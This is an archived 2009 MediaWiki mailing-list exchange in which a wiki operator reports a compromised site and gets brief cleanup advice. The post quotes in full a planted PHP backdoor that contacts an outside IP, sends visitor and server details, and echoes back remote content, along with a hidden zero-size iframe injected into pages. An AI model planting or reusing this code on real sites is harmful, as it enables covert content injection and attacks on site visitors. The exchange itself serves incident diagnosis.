[Mediawiki-l] HTML:Iframe-inf virus?
Platonides
Platonides at gmail.com
Mon Jun 22 23:12:18 UTC 2009
Tim Ware wrote:
> I notice several files that seem to have modified at the docroot level:
>
> foter.php (never noticed this one before) with this content:
>
> <?php
> $ip = '209.62.27.83';
> $port = '80';
> $path = '/linkr/get/';
> $fp = fsockopen($ip, $port, $errno, $errstr, 30);
> if (!$fp) {
> echo '';
> } else {
> $post =
> "u
> =
> ".rawurlencode
> ($
> _SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']);
> $out = "POST ".$path." HTTP/1.0\r\n";
> $out .= "Host: ".$ip.":".$port."\r\n";
> $out .= "Content-Type: text/html\r\n";
> $out .= "Content-Length: ".strlen($post)."\r\n";
> $out .= "Connection: Close\r\n";
> $out .= "\r\n";
> $out .= $post;
> fwrite($fp, $out);
> $resp = '';
> while (!feof($fp)) {
> $resp .= fgets($fp, 128);
> }
> fclose($fp);
> $paths = split("\r\n\r\n", $resp);
> echo $paths[1];
> }
> ?>
>
>
>
> and this "m-analytics" code was added to an old index page and a
> google verification page:
>
>
> <iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a
> " width=0 height=0 style="hidden" frameborder=0 marginheight=0
> marginwidth=0 scrolling=no></iframe>
>
> Same thing happened to another wiki on this site, where the m-
> analytics iframe was added. I *did not* add this, so I suspect foul
> play.
>
> Thoughts?
>
> Tim
Backup everything and start from scratch.
The only files from the wiki you should need to keep are the uploads.
Remember to verify there aren't scripts there.
More information about the MediaWiki-l
mailing list